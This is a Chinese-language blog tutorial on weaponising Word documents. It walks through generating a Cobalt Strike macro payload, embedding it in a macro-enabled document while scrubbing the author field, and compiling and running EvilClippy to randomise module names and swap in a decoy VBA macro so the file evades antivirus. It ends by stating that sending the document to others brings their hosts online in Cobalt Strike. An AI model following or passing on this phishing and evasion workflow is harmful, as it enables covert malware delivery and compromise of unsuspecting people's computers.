Cobalt-Strike Office宏利用与免杀

1.打开Cobalt-Strike生产Office宏病毒。
首先需要设置监听器、因为钓鱼的目标比较单纯,在这里就不采用域前置技术。
Cobalt-Strike Office宏利用与免杀_第1张图片
然后使用攻击模块,生产Office宏病毒。
Cobalt-Strike Office宏利用与免杀_第2张图片
设置好监听器。
Cobalt-Strike Office宏利用与免杀_第3张图片
生成宏病毒
Cobalt-Strike Office宏利用与免杀_第4张图片
2.将宏病毒放入word
首先打开Word,在审阅中编辑宏:
创建新的宏:
Cobalt-Strike Office宏利用与免杀_第5张图片
将生成的宏病毒放入Microsoft Word目录下的ThisDocument,注意如果宏位置写错了很容易报错。
Cobalt-Strike Office宏利用与免杀_第6张图片
按下Ctrl+S,将文件保存为启用宏的Word文档,注意这里的作者需要修改,否则默认会使用账户名
Cobalt-Strike Office宏利用与免杀_第7张图片
此时带宏病毒的Word文件已经生成,但是会发现过不了杀软,需要进行免杀。
Cobalt-Strike Office宏利用与免杀_第8张图片
 
此时需要一款比较知名的免杀软件:EvilClippy
最新版本的:https://github.com/outflanknl/EvilClippy/releases/tag/v1.3
软件需要编译运行,由于本人使用的是Linux环境进行免杀,所以命令如下:
首先需要有mono环境:
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
echo "deb http://download.mono-project.com/repo/debian wheezy main" | sudo tee /etc/apt/sources.list.d/mono-xamarin.list
sudo apt-get update
sudo apt-get install mono-completesudo 
apt-get install monodevelop
然后使用mono,进行编译:
mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs
检查免杀软件是否可以正常运行:
mono EvilClippy.exe -h
然后进行免杀操作:
首先需要创建一个vba文件,后续需要进行混淆,vba内容如下
Sub Hello()
Dim X
X=MsgBox("Hello VBS")
#先使用一个模块来设置随机模块名,混淆了一些分析工具,会生成一个以_EvilClippy.docm结尾的文件。
mono EvilClippy.exe -r Doc1.docm
#其次使用之前设置的vba文件对生成文件进行伪装混淆,命令如下
mono EvilClippy.exe -s 3.vba Doc1_EvilClippy.docm
生成文件,放入沙箱进行查杀,效果如下:
Cobalt-Strike Office宏利用与免杀_第9张图片
过了国内大部分杀软。
Cobalt-Strike Office宏利用与免杀_第10张图片

因此将文件发给别人就可以观察到Cobalt-Strike有上线 主机了。

 
 

你可能感兴趣的:(Cobalt-Strike Office宏利用与免杀)